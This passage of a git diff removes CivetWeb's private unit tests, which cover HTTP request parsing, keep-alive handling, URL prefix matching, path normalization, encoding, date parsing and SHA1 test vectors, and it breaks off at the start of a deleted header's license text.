-	ck_assert_int_eq(-1, test_parse_http_request(req11, lenreq11, &ri));
-
-
-	/* req12 is a valid request with body data */
-	ck_assert_int_gt(lenreq12, lenhdr12);
-	ck_assert_int_eq(lenhdr12, get_http_header_len(req12, lenreq12));
-	ck_assert_int_eq(lenhdr12, test_parse_http_request(req12, lenreq12, &ri));
-}
-END_TEST
-
-
-START_TEST(test_should_keep_alive)
-{
-	/* Adapted from unit_test.c */
-	/* Copyright (c) 2013-2015 the Civetweb developers */
-	/* Copyright (c) 2004-2013 Sergey Lyubka */
-	struct mg_connection conn;
-	struct mg_context ctx;
-	char req1[] = "GET / HTTP/1.1\r\n\r\n";
-	char req2[] = "GET / HTTP/1.0\r\n\r\n";
-	char req3[] = "GET / HTTP/1.1\r\nConnection: close\r\n\r\n";
-	char req4[] = "GET / HTTP/1.1\r\nConnection: keep-alive\r\n\r\n";
-	char yes[] = "yes";
-	char no[] = "no";
-
-	int lenreq1 = (int)strlen(req1);
-	int lenreq2 = (int)strlen(req2);
-	int lenreq3 = (int)strlen(req3);
-	int lenreq4 = (int)strlen(req4);
-
-	mark_point();
-
-	memset(&ctx, 0, sizeof(ctx));
-	memset(&conn, 0, sizeof(conn));
-	conn.ctx = &ctx;
-	ck_assert_int_eq(test_parse_http_request(req1, lenreq1, &conn.request_info),
-	                 lenreq1);
-	conn.connection_type = 1; /* Valid request */
-	ck_assert_int_eq(conn.request_info.num_headers, 0);
-
-	ctx.config[ENABLE_KEEP_ALIVE] = no;
-	ck_assert_int_eq(should_keep_alive(&conn), 0);
-
-	ctx.config[ENABLE_KEEP_ALIVE] = yes;
-	ck_assert_int_eq(should_keep_alive(&conn), 1);
-
-	conn.must_close = 1;
-	ck_assert_int_eq(should_keep_alive(&conn), 0);
-
-	conn.must_close = 0;
-	test_parse_http_request(req2, lenreq2, &conn.request_info);
-	conn.connection_type = 1; /* Valid request */
-	ck_assert_int_eq(conn.request_info.num_headers, 0);
-	ck_assert_int_eq(should_keep_alive(&conn), 0);
-
-	test_parse_http_request(req3, lenreq3, &conn.request_info);
-	conn.connection_type = 1; /* Valid request */
-	ck_assert_int_eq(conn.request_info.num_headers, 1);
-	ck_assert_int_eq(should_keep_alive(&conn), 0);
-
-	test_parse_http_request(req4, lenreq4, &conn.request_info);
-	conn.connection_type = 1; /* Valid request */
-	ck_assert_int_eq(conn.request_info.num_headers, 1);
-	ck_assert_int_eq(should_keep_alive(&conn), 1);
-
-	conn.status_code = 200;
-	conn.must_close = 1;
-	ck_assert_int_eq(should_keep_alive(&conn), 0);
-
-	conn.status_code = 200;
-	conn.must_close = 0;
-	ck_assert_int_eq(should_keep_alive(&conn), 1);
-
-	conn.status_code = 200;
-	conn.must_close = 0;
-	conn.connection_type = 0; /* invalid */
-	ck_assert_int_eq(should_keep_alive(&conn), 0);
-}
-END_TEST
-
-
-START_TEST(test_match_prefix)
-{
-	/* Adapted from unit_test.c */
-	/* Copyright (c) 2013-2015 the Civetweb developers */
-	/* Copyright (c) 2004-2013 Sergey Lyubka */
-	ck_assert_int_eq(4, match_prefix("/api", 4, "/api"));
-	ck_assert_int_eq(3, match_prefix("/a/", 3, "/a/b/c"));
-	ck_assert_int_eq(-1, match_prefix("/a/", 3, "/ab/c"));
-	ck_assert_int_eq(4, match_prefix("/*/", 3, "/ab/c"));
-	ck_assert_int_eq(6, match_prefix("**", 2, "/a/b/c"));
-	ck_assert_int_eq(2, match_prefix("/*", 2, "/a/b/c"));
-	ck_assert_int_eq(2, match_prefix("*/*", 3, "/a/b/c"));
-	ck_assert_int_eq(5, match_prefix("**/", 3, "/a/b/c"));
-	ck_assert_int_eq(5, match_prefix("**.foo|**.bar", 13, "a.bar"));
-	ck_assert_int_eq(2, match_prefix("a|b|cd", 6, "cdef"));
-	ck_assert_int_eq(2, match_prefix("a|b|c?", 6, "cdef"));
-	ck_assert_int_eq(1, match_prefix("a|?|cd", 6, "cdef"));
-	ck_assert_int_eq(-1, match_prefix("/a/**.cgi", 9, "/foo/bar/x.cgi"));
-	ck_assert_int_eq(12, match_prefix("/a/**.cgi", 9, "/a/bar/x.cgi"));
-	ck_assert_int_eq(5, match_prefix("**/", 3, "/a/b/c"));
-	ck_assert_int_eq(-1, match_prefix("**/$", 4, "/a/b/c"));
-	ck_assert_int_eq(5, match_prefix("**/$", 4, "/a/b/"));
-	ck_assert_int_eq(0, match_prefix("$", 1, ""));
-	ck_assert_int_eq(-1, match_prefix("$", 1, "x"));
-	ck_assert_int_eq(1, match_prefix("*$", 2, "x"));
-	ck_assert_int_eq(1, match_prefix("/$", 2, "/"));
-	ck_assert_int_eq(-1, match_prefix("**/$", 4, "/a/b/c"));
-	ck_assert_int_eq(5, match_prefix("**/$", 4, "/a/b/"));
-	ck_assert_int_eq(0, match_prefix("*", 1, "/hello/"));
-	ck_assert_int_eq(-1, match_prefix("**.a$|**.b$", 11, "/a/b.b/"));
-	ck_assert_int_eq(6, match_prefix("**.a$|**.b$", 11, "/a/b.b"));
-	ck_assert_int_eq(6, match_prefix("**.a$|**.b$", 11, "/a/B.A"));
-	ck_assert_int_eq(5, match_prefix("**o$", 4, "HELLO"));
-}
-END_TEST
-
-
-START_TEST(test_remove_double_dots_and_double_slashes)
-{
-	/* Adapted from unit_test.c */
-	/* Copyright (c) 2013-2015 the Civetweb developers */
-	/* Copyright (c) 2004-2013 Sergey Lyubka */
-	struct {
-		char before[20], after[20];
-	} data[] = {
-	    {"////a", "/a"},
-	    {"/.....", "/."},
-	    {"/......", "/"},
-	    {"..", "."},
-	    {"...", "."},
-	    {"/...///", "/./"},
-	    {"/a...///", "/a.../"},
-	    {"/.x", "/.x"},
-	    {"/\\", "/"},
-	    {"/a\\", "/a\\"},
-	    {"/a\\\\...", "/a\\."},
-	};
-	size_t i;
-
-	mark_point();
-
-	for (i = 0; i < ARRAY_SIZE(data); i++) {
-		remove_double_dots_and_double_slashes(data[i].before);
-		ck_assert_str_eq(data[i].before, data[i].after);
-	}
-}
-END_TEST
-
-
-START_TEST(test_is_valid_uri)
-{
-	/* is_valid_uri is superseeded by get_uri_type */
-	ck_assert_int_eq(2, get_uri_type("/api"));
-	ck_assert_int_eq(2, get_uri_type("/api/"));
-	ck_assert_int_eq(2,
-	                 get_uri_type("/some/long/path%20with%20space/file.xyz"));
-	ck_assert_int_eq(0, get_uri_type("api"));
-	ck_assert_int_eq(1, get_uri_type("*"));
-	ck_assert_int_eq(0, get_uri_type("*xy"));
-	ck_assert_int_eq(3, get_uri_type("http://somewhere/"));
-	ck_assert_int_eq(3, get_uri_type("https://somewhere/some/file.html"));
-	ck_assert_int_eq(4, get_uri_type("http://somewhere:8080/"));
-	ck_assert_int_eq(4, get_uri_type("https://somewhere:8080/some/file.html"));
-}
-END_TEST
-
-
-START_TEST(test_next_option)
-{
-	/* Adapted from unit_test.c */
-	/* Copyright (c) 2013-2015 the Civetweb developers */
-	/* Copyright (c) 2004-2013 Sergey Lyubka */
-	const char *p, *list = "x/8,/y**=1;2k,z";
-	struct vec a, b;
-	int i;
-
-	mark_point();
-
-	ck_assert(next_option(NULL, &a, &b) == NULL);
-	for (i = 0, p = list; (p = next_option(p, &a, &b)) != NULL; i++) {
-		ck_assert(i != 0 || (a.ptr == list && a.len == 3 && b.len == 0));
-		ck_assert(i != 1
-		          || (a.ptr == list + 4 && a.len == 4 && b.ptr == list + 9
-		              && b.len == 4));
-		ck_assert(i != 2 || (a.ptr == list + 14 && a.len == 1 && b.len == 0));
-	}
-}
-END_TEST
-
-
-START_TEST(test_skip_quoted)
-{
-	/* Adapted from unit_test.c */
-	/* Copyright (c) 2013-2015 the Civetweb developers */
-	/* Copyright (c) 2004-2013 Sergey Lyubka */
-	char x[] = "a=1, b=2, c='hi \' there', d='here\\, there'", *s = x, *p;
-
-	mark_point();
-
-	p = skip_quoted(&s, ", ", ", ", 0);
-	ck_assert(p != NULL && !strcmp(p, "a=1"));
-
-	p = skip_quoted(&s, ", ", ", ", 0);
-	ck_assert(p != NULL && !strcmp(p, "b=2"));
-
-	p = skip_quoted(&s, ",", " ", 0);
-	ck_assert(p != NULL && !strcmp(p, "c='hi \' there'"));
-
-	p = skip_quoted(&s, ",", " ", '\\');
-	ck_assert(p != NULL && !strcmp(p, "d='here, there'"));
-	ck_assert(*s == 0);
-}
-END_TEST
-
-
-static int
-alloc_printf(char **buf, size_t size, const char *fmt, ...)
-{
-	/* Test helper function - adapted from unit_test.c */
-	/* Copyright (c) 2013-2015 the Civetweb developers */
-	/* Copyright (c) 2004-2013 Sergey Lyubka */
-	va_list ap;
-	int ret = 0;
-
-	mark_point();
-
-	va_start(ap, fmt);
-	ret = alloc_vprintf(buf, *buf, size, fmt, ap);
-	va_end(ap);
-
-	return ret;
-}
-
-
-static int
-alloc_printf2(char **buf, const char *fmt, ...)
-{
-	/* Test alternative implementation */
-	va_list ap;
-	int ret = 0;
-
-	mark_point();
-
-	va_start(ap, fmt);
-	ret = alloc_vprintf2(buf, fmt, ap);
-	va_end(ap);
-
-	return ret;
-}
-
-
-START_TEST(test_alloc_vprintf)
-{
-	/* Adapted from unit_test.c */
-	/* Copyright (c) 2013-2015 the Civetweb developers */
-	/* Copyright (c) 2004-2013 Sergey Lyubka */
-	char buf[MG_BUF_LEN], *p = buf;
-	mark_point();
-
-	ck_assert(alloc_printf(&p, sizeof(buf), "%s", "hi") == 2);
-	ck_assert(p == buf);
-
-	ck_assert(alloc_printf(&p, sizeof(buf), "%s", "") == 0);
-	ck_assert(p == buf);
-
-	ck_assert(alloc_printf(&p, sizeof(buf), "") == 0);
-	ck_assert(p == buf);
-
-	/* Pass small buffer, make sure alloc_printf allocates */
-	ck_assert(alloc_printf(&p, 1, "%s", "hello") == 5);
-	ck_assert(p != buf);
-	mg_free(p);
-	p = buf;
-
-	/* Test alternative implementation */
-	ck_assert(alloc_printf2(&p, "%s", "hello") == 5);
-	ck_assert(p != buf);
-	mg_free(p);
-	p = buf;
-}
-END_TEST
-
-
-START_TEST(test_mg_vsnprintf)
-{
-	char buf[16];
-	int is_trunc;
-
-#if defined(_WIN32)
-	/* If the string is truncated, mg_snprintf calls mg_cry.
-	 * If DEBUG is defined, mg_cry calls DEBUG_TRACE.
-	 * In DEBUG_TRACE_FUNC, flockfile(stdout) is called.
-	 * For Windows, flockfile/funlockfile calls Enter-/
-	 * LeaveCriticalSection(&global_log_file_lock).
-	 * So, we need to initialize global_log_file_lock:
-	 */
-	InitializeCriticalSection(&global_log_file_lock);
-#endif
-
-	memset(buf, 0, sizeof(buf));
-	mark_point();
-
-	is_trunc = 777;
-	mg_snprintf(NULL, &is_trunc, buf, 10, "%8i", 123);
-	ck_assert_str_eq(buf, "     123");
-	ck_assert_int_eq(is_trunc, 0);
-
-	is_trunc = 777;
-	mg_snprintf(NULL, &is_trunc, buf, 10, "%9i", 123);
-	ck_assert_str_eq(buf, "      123");
-	ck_assert_int_eq(is_trunc, 0);
-
-	is_trunc = 777;
-	mg_snprintf(NULL, &is_trunc, buf, 9, "%9i", 123);
-	ck_assert_str_eq(buf, "      12");
-	ck_assert_int_eq(is_trunc, 1);
-
-	is_trunc = 777;
-	mg_snprintf(NULL, &is_trunc, buf, 8, "%9i", 123);
-	ck_assert_str_eq(buf, "      1");
-	ck_assert_int_eq(is_trunc, 1);
-
-	is_trunc = 777;
-	mg_snprintf(NULL, &is_trunc, buf, 7, "%9i", 123);
-	ck_assert_str_eq(buf, "      ");
-	ck_assert_int_eq(is_trunc, 1);
-
-	is_trunc = 777;
-	strcpy(buf, "1234567890");
-	mg_snprintf(NULL, &is_trunc, buf, 0, "%i", 543);
-	ck_assert_str_eq(buf, "1234567890");
-	ck_assert_int_eq(is_trunc, 1);
-}
-END_TEST
-
-
-START_TEST(test_mg_strcasestr)
-{
-	/* Adapted from unit_test.c */
-	/* Copyright (c) 2013-2015 the Civetweb developers */
-	/* Copyright (c) 2004-2013 Sergey Lyubka */
-	static const char *big1 = "abcdef";
-	mark_point();
-
-	ck_assert(mg_strcasestr("Y", "X") == NULL);
-	ck_assert(mg_strcasestr("Y", "y") != NULL);
-	ck_assert(mg_strcasestr(big1, "X") == NULL);
-	ck_assert(mg_strcasestr(big1, "CD") == big1 + 2);
-	ck_assert(mg_strcasestr("aa", "AAB") == NULL);
-}
-END_TEST
-
-
-START_TEST(test_parse_port_string)
-{
-	/* Adapted from unit_test.c */
-	/* Copyright (c) 2013-2015 the Civetweb developers */
-	/* Copyright (c) 2004-2013 Sergey Lyubka */
-	static const char *valid[] =
-	{ "0",
-	  "1",
-	  "1s",
-	  "1r",
-	  "1.2.3.4:1",
-	  "1.2.3.4:1s",
-	  "1.2.3.4:1r",
-#if defined(USE_IPV6)
-	  "[::1]:123",
-	  "[::]:80",
-	  "[3ffe:2a00:100:7031::1]:900",
-	  "+80",
-#endif
-	  NULL };
-	static const char *invalid[] = {
-	    "99999", "1k", "1.2.3", "1.2.3.4:", "1.2.3.4:2p", NULL};
-	struct socket so;
-	struct vec vec;
-	int ip_family;
-	int i;
-
-	mark_point();
-
-	for (i = 0; valid[i] != NULL; i++) {
-		vec.ptr = valid[i];
-		vec.len = strlen(vec.ptr);
-		ip_family = 123;
-		ck_assert_int_ne(parse_port_string(&vec, &so, &ip_family), 0);
-		if (i < 7) {
-			ck_assert_int_eq(ip_family, 4);
-		} else if (i < 10) {
-			ck_assert_int_eq(ip_family, 6);
-		} else {
-			ck_assert_int_eq(ip_family, 4 + 6);
-		}
-	}
-
-	for (i = 0; invalid[i] != NULL; i++) {
-		vec.ptr = invalid[i];
-		vec.len = strlen(vec.ptr);
-		ip_family = 123;
-		ck_assert_int_eq(parse_port_string(&vec, &so, &ip_family), 0);
-		ck_assert_int_eq(ip_family, 0);
-	}
-}
-END_TEST
-
-
-START_TEST(test_encode_decode)
-{
-	char buf[128];
-	const char *alpha = "abcdefghijklmnopqrstuvwxyz";
-	const char *nonalpha = " !\"#$%&'()*+,-./0123456789:;<=>?@";
-	const char *nonalpha_url_enc1 =
-	    "%20%21%22%23$%25%26%27()%2a%2b,-.%2f0123456789%3a;%3c%3d%3e%3f%40";
-	const char *nonalpha_url_enc2 =
-	    "%20!%22%23%24%25%26'()*%2B%2C-.%2F0123456789%3A%3B%3C%3D%3E%3F%40";
-	int ret;
-	size_t len;
-
-#if defined(USE_WEBSOCKET) || defined(USE_LUA)
-	const char *alpha_b64_enc = "YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXo=";
-	const char *nonalpha_b64_enc =
-	    "ICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9Pj9A";
-
-	mark_point();
-
-	memset(buf, 77, sizeof(buf));
-	base64_encode((unsigned char *)"a", 1, buf);
-	ck_assert_str_eq(buf, "YQ==");
-
-	memset(buf, 77, sizeof(buf));
-	base64_encode((unsigned char *)"ab", 1, buf);
-	ck_assert_str_eq(buf, "YQ==");
-
-	memset(buf, 77, sizeof(buf));
-	base64_encode((unsigned char *)"ab", 2, buf);
-	ck_assert_str_eq(buf, "YWI=");
-
-	memset(buf, 77, sizeof(buf));
-	base64_encode((unsigned char *)alpha, 3, buf);
-	ck_assert_str_eq(buf, "YWJj");
-
-	memset(buf, 77, sizeof(buf));
-	base64_encode((unsigned char *)alpha, 4, buf);
-	ck_assert_str_eq(buf, "YWJjZA==");
-
-	memset(buf, 77, sizeof(buf));
-	base64_encode((unsigned char *)alpha, 5, buf);
-	ck_assert_str_eq(buf, "YWJjZGU=");
-
-	memset(buf, 77, sizeof(buf));
-	base64_encode((unsigned char *)alpha, 6, buf);
-	ck_assert_str_eq(buf, "YWJjZGVm");
-
-	memset(buf, 77, sizeof(buf));
-	base64_encode((unsigned char *)alpha, (int)strlen(alpha), buf);
-	ck_assert_str_eq(buf, alpha_b64_enc);
-
-	memset(buf, 77, sizeof(buf));
-	base64_encode((unsigned char *)nonalpha, (int)strlen(nonalpha), buf);
-	ck_assert_str_eq(buf, nonalpha_b64_enc);
-#endif
-
-#if defined(USE_LUA)
-	memset(buf, 77, sizeof(buf));
-	len = 9999;
-	ret = base64_decode((unsigned char *)alpha_b64_enc,
-	                    (int)strlen(alpha_b64_enc),
-	                    buf,
-	                    &len);
-	ck_assert_int_eq(ret, -1);
-	ck_assert_uint_eq((unsigned int)len, (unsigned int)strlen(alpha));
-	ck_assert_str_eq(buf, alpha);
-
-	memset(buf, 77, sizeof(buf));
-	len = 9999;
-	ret = base64_decode((unsigned char *)"AAA*AAA", 7, buf, &len);
-	ck_assert_int_eq(ret, 3);
-#endif
-
-	memset(buf, 77, sizeof(buf));
-	ret = mg_url_encode(alpha, buf, sizeof(buf));
-	ck_assert_int_eq(ret, (int)strlen(buf));
-	ck_assert_int_eq(ret, (int)strlen(alpha));
-	ck_assert_str_eq(buf, alpha);
-
-	memset(buf, 77, sizeof(buf));
-	ret = mg_url_encode(nonalpha, buf, sizeof(buf));
-	ck_assert_int_eq(ret, (int)strlen(buf));
-	ck_assert_int_eq(ret, (int)strlen(nonalpha_url_enc1));
-	ck_assert_str_eq(buf, nonalpha_url_enc1);
-
-	memset(buf, 77, sizeof(buf));
-	ret = mg_url_decode(alpha, (int)strlen(alpha), buf, sizeof(buf), 0);
-	ck_assert_int_eq(ret, (int)strlen(buf));
-	ck_assert_int_eq(ret, (int)strlen(alpha));
-	ck_assert_str_eq(buf, alpha);
-
-	memset(buf, 77, sizeof(buf));
-	ret = mg_url_decode(
-	    nonalpha_url_enc1, (int)strlen(nonalpha_url_enc1), buf, sizeof(buf), 0);
-	ck_assert_int_eq(ret, (int)strlen(buf));
-	ck_assert_int_eq(ret, (int)strlen(nonalpha));
-	ck_assert_str_eq(buf, nonalpha);
-
-	memset(buf, 77, sizeof(buf));
-	ret = mg_url_decode(
-	    nonalpha_url_enc2, (int)strlen(nonalpha_url_enc2), buf, sizeof(buf), 0);
-	ck_assert_int_eq(ret, (int)strlen(buf));
-	ck_assert_int_eq(ret, (int)strlen(nonalpha));
-	ck_assert_str_eq(buf, nonalpha);
-
-	/* len could be unused, if base64_decode is not tested because USE_LUA is
-	 * not defined */
-	(void)len;
-}
-END_TEST
-
-
-START_TEST(test_mask_data)
-{
-#if defined(USE_WEBSOCKET)
-	char in[1024];
-	char out[1024];
-	int i;
-#endif
-
-	uint32_t mask = 0x61626364;
-	/* TODO: adapt test for big endian */
-	ck_assert((*(unsigned char *)&mask) == 0x64u);
-
-#if defined(USE_WEBSOCKET)
-	memset(in, 0, sizeof(in));
-	memset(out, 99, sizeof(out));
-
-	mask_data(in, sizeof(out), 0, out);
-	ck_assert(!memcmp(out, in, sizeof(out)));
-
-	for (i = 0; i < 1024; i++) {
-		in[i] = (char)((unsigned char)i);
-	}
-	mask_data(in, 107, 0, out);
-	ck_assert(!memcmp(out, in, 107));
-
-	mask_data(in, 256, 0x01010101, out);
-	for (i = 0; i < 256; i++) {
-		ck_assert_int_eq((int)((unsigned char)out[i]),
-		                 (int)(((unsigned char)in[i]) ^ (char)1u));
-	}
-	for (i = 256; i < (int)sizeof(out); i++) {
-		ck_assert_int_eq((int)((unsigned char)out[i]), (int)0);
-	}
-
-	/* TODO: check this for big endian */
-	mask_data(in, 5, 0x01020304, out);
-	ck_assert_uint_eq((unsigned char)out[0], 0u ^ 4u);
-	ck_assert_uint_eq((unsigned char)out[1], 1u ^ 3u);
-	ck_assert_uint_eq((unsigned char)out[2], 2u ^ 2u);
-	ck_assert_uint_eq((unsigned char)out[3], 3u ^ 1u);
-	ck_assert_uint_eq((unsigned char)out[4], 4u ^ 4u);
-#endif
-}
-END_TEST
-
-
-START_TEST(test_parse_date_string)
-{
-#if !defined(NO_CACHING)
-	time_t now = time(0);
-	struct tm *tm = gmtime(&now);
-	char date[64] = {0};
-	unsigned long i;
-
-	ck_assert_uint_eq((unsigned long)parse_date_string("1/Jan/1970 00:01:02"),
-	                  62ul);
-	ck_assert_uint_eq((unsigned long)parse_date_string("1 Jan 1970 00:02:03"),
-	                  123ul);
-	ck_assert_uint_eq((unsigned long)parse_date_string("1-Jan-1970 00:03:04"),
-	                  184ul);
-	ck_assert_uint_eq((unsigned long)parse_date_string(
-	                      "Xyz, 1 Jan 1970 00:04:05"),
-	                  245ul);
-
-	gmt_time_string(date, sizeof(date), &now);
-	ck_assert_uint_eq((uintmax_t)parse_date_string(date), (uintmax_t)now);
-
-	sprintf(date,
-	        "%02u %s %04u %02u:%02u:%02u",
-	        tm->tm_mday,
-	        month_names[tm->tm_mon],
-	        tm->tm_year + 1900,
-	        tm->tm_hour,
-	        tm->tm_min,
-	        tm->tm_sec);
-	ck_assert_uint_eq((uintmax_t)parse_date_string(date), (uintmax_t)now);
-
-	gmt_time_string(date, 1, NULL);
-	ck_assert_str_eq(date, "");
-	gmt_time_string(date, 6, NULL);
-	ck_assert_str_eq(date,
-	                 "Thu, "); /* part of "Thu, 01 Jan 1970 00:00:00 GMT" */
-	gmt_time_string(date, sizeof(date), NULL);
-	ck_assert_str_eq(date, "Thu, 01 Jan 1970 00:00:00 GMT");
-
-	for (i = 2ul; i < 0x8000000ul; i += i / 2) {
-		now = (time_t)i;
-
-		gmt_time_string(date, sizeof(date), &now);
-		ck_assert_uint_eq((uintmax_t)parse_date_string(date), (uintmax_t)now);
-
-		tm = gmtime(&now);
-		sprintf(date,
-		        "%02u-%s-%04u %02u:%02u:%02u",
-		        tm->tm_mday,
-		        month_names[tm->tm_mon],
-		        tm->tm_year + 1900,
-		        tm->tm_hour,
-		        tm->tm_min,
-		        tm->tm_sec);
-		ck_assert_uint_eq((uintmax_t)parse_date_string(date), (uintmax_t)now);
-	}
-#endif
-}
-END_TEST
-
-
-START_TEST(test_sha1)
-{
-#ifdef SHA1_DIGEST_SIZE
-	SHA_CTX sha_ctx;
-	uint8_t digest[SHA1_DIGEST_SIZE] = {0};
-	char str[48] = {0};
-	int i;
-	const char *test_str;
-
-	ck_assert_uint_eq(sizeof(digest), 20);
-	ck_assert_uint_gt(sizeof(str), sizeof(digest) * 2 + 1);
-
-	/* empty string */
-	SHA1_Init(&sha_ctx);
-	SHA1_Final(digest, &sha_ctx);
-	bin2str(str, digest, sizeof(digest));
-	ck_assert_uint_eq(strlen(str), 40);
-	ck_assert_str_eq(str, "da39a3ee5e6b4b0d3255bfef95601890afd80709");
-
-	/* empty string */
-	SHA1_Init(&sha_ctx);
-	SHA1_Update(&sha_ctx, (uint8_t *)"abc", 0);
-	SHA1_Final(digest, &sha_ctx);
-	bin2str(str, digest, sizeof(digest));
-	ck_assert_uint_eq(strlen(str), 40);
-	ck_assert_str_eq(str, "da39a3ee5e6b4b0d3255bfef95601890afd80709");
-
-	/* "abc" */
-	SHA1_Init(&sha_ctx);
-	SHA1_Update(&sha_ctx, (uint8_t *)"abc", 3);
-	SHA1_Final(digest, &sha_ctx);
-	bin2str(str, digest, sizeof(digest));
-	ck_assert_uint_eq(strlen(str), 40);
-	ck_assert_str_eq(str, "a9993e364706816aba3e25717850c26c9cd0d89d");
-
-	/* "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq" */
-	test_str = "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq";
-	SHA1_Init(&sha_ctx);
-	SHA1_Update(&sha_ctx, (uint8_t *)test_str, (uint32_t)strlen(test_str));
-	SHA1_Final(digest, &sha_ctx);
-	bin2str(str, digest, sizeof(digest));
-	ck_assert_uint_eq(strlen(str), 40);
-	ck_assert_str_eq(str, "84983e441c3bd26ebaae4aa1f95129e5e54670f1");
-
-	/* a million "a" */
-	SHA1_Init(&sha_ctx);
-	for (i = 0; i < 1000000; i++) {
-		SHA1_Update(&sha_ctx, (uint8_t *)"a", 1);
-	}
-	SHA1_Final(digest, &sha_ctx);
-	bin2str(str, digest, sizeof(digest));
-	ck_assert_uint_eq(strlen(str), 40);
-	ck_assert_str_eq(str, "34aa973cd4c4daa4f61eeb2bdbad27316534016f");
-
-	/* a million "a" in blocks of 10 */
-	SHA1_Init(&sha_ctx);
-	for (i = 0; i < 100000; i++) {
-		SHA1_Update(&sha_ctx, (uint8_t *)"aaaaaaaaaa", 10);
-	}
-	SHA1_Final(digest, &sha_ctx);
-	bin2str(str, digest, sizeof(digest));
-	ck_assert_uint_eq(strlen(str), 40);
-	ck_assert_str_eq(str, "34aa973cd4c4daa4f61eeb2bdbad27316534016f");
-#else
-	/* Can not test, if SHA1 is not included */
-	ck_assert(1);
-#endif
-}
-END_TEST
-
-
-#if !defined(REPLACE_CHECK_FOR_LOCAL_DEBUGGING)
-Suite *
-make_private_suite(void)
-{
-	Suite *const suite = suite_create("Private");
-
-	TCase *const tcase_http_message = tcase_create("HTTP Message");
-	TCase *const tcase_http_keep_alive = tcase_create("HTTP Keep Alive");
-	TCase *const tcase_url_parsing_1 = tcase_create("URL Parsing 1");
-	TCase *const tcase_url_parsing_2 = tcase_create("URL Parsing 2");
-	TCase *const tcase_url_parsing_3 = tcase_create("URL Parsing 3");
-	TCase *const tcase_internal_parse_1 = tcase_create("Internal Parsing 1");
-	TCase *const tcase_internal_parse_2 = tcase_create("Internal Parsing 2");
-	TCase *const tcase_internal_parse_3 = tcase_create("Internal Parsing 3");
-	TCase *const tcase_internal_parse_4 = tcase_create("Internal Parsing 4");
-	TCase *const tcase_internal_parse_5 = tcase_create("Internal Parsing 5");
-	TCase *const tcase_internal_parse_6 = tcase_create("Internal Parsing 6");
-	TCase *const tcase_encode_decode = tcase_create("Encode Decode");
-	TCase *const tcase_mask_data = tcase_create("Mask Data");
-	TCase *const tcase_parse_date_string = tcase_create("Date Parsing");
-	TCase *const tcase_sha1 = tcase_create("SHA1");
-
-	tcase_add_test(tcase_http_message, test_parse_http_message);
-	tcase_set_timeout(tcase_http_message, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_http_message);
-
-	tcase_add_test(tcase_http_keep_alive, test_should_keep_alive);
-	tcase_set_timeout(tcase_http_keep_alive, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_http_keep_alive);
-
-	tcase_add_test(tcase_url_parsing_1, test_match_prefix);
-	tcase_set_timeout(tcase_url_parsing_1, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_url_parsing_1);
-
-	tcase_add_test(tcase_url_parsing_2,
-	               test_remove_double_dots_and_double_slashes);
-	tcase_set_timeout(tcase_url_parsing_2, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_url_parsing_2);
-
-	tcase_add_test(tcase_url_parsing_3, test_is_valid_uri);
-	tcase_set_timeout(tcase_url_parsing_3, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_url_parsing_3);
-
-	tcase_add_test(tcase_internal_parse_1, test_next_option);
-	tcase_set_timeout(tcase_internal_parse_1, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_internal_parse_1);
-
-	tcase_add_test(tcase_internal_parse_2, test_skip_quoted);
-	tcase_set_timeout(tcase_internal_parse_2, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_internal_parse_2);
-
-	tcase_add_test(tcase_internal_parse_3, test_mg_strcasestr);
-	tcase_set_timeout(tcase_internal_parse_3, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_internal_parse_3);
-
-	tcase_add_test(tcase_internal_parse_4, test_alloc_vprintf);
-	tcase_set_timeout(tcase_internal_parse_4, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_internal_parse_4);
-
-	tcase_add_test(tcase_internal_parse_5, test_mg_vsnprintf);
-	tcase_set_timeout(tcase_internal_parse_5, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_internal_parse_5);
-
-	tcase_add_test(tcase_internal_parse_6, test_parse_port_string);
-	tcase_set_timeout(tcase_internal_parse_6, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_internal_parse_6);
-
-	tcase_add_test(tcase_encode_decode, test_encode_decode);
-	tcase_set_timeout(tcase_encode_decode, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_encode_decode);
-
-	tcase_add_test(tcase_mask_data, test_mask_data);
-	tcase_set_timeout(tcase_mask_data, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_mask_data);
-
-	tcase_add_test(tcase_parse_date_string, test_parse_date_string);
-	tcase_set_timeout(tcase_parse_date_string, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_parse_date_string);
-
-	tcase_add_test(tcase_sha1, test_sha1);
-	tcase_set_timeout(tcase_sha1, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_sha1);
-
-	return suite;
-}
-#endif
-
-
-#ifdef REPLACE_CHECK_FOR_LOCAL_DEBUGGING
-/* Used to debug test cases without using the check framework */
-
-void
-MAIN_PRIVATE(void)
-{
-#if defined(_WIN32)
-	/* test_parse_port_string requires WSAStartup for IPv6 */
-	WSADATA data;
-	WSAStartup(MAKEWORD(2, 2), &data);
-#endif
-
-	test_alloc_vprintf(0);
-	test_mg_vsnprintf(0);
-	test_remove_double_dots_and_double_slashes(0);
-	test_parse_date_string(0);
-	test_parse_port_string(0);
-	test_parse_http_message(0);
-	test_sha1(0);
-
-#if defined(_WIN32)
-	WSACleanup();
-#endif
-}
-
-#endif
diff --git a/thirdparty/civetweb-1.10/test/private.h b/thirdparty/civetweb-1.10/test/private.h
deleted file mode 100644
index 670b665..0000000
--- a/thirdparty/civetweb-1.10/test/private.h
+++ /dev/null
@@ -1,28 +0,0 @@
-/* Copyright (c) 2015-2017 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
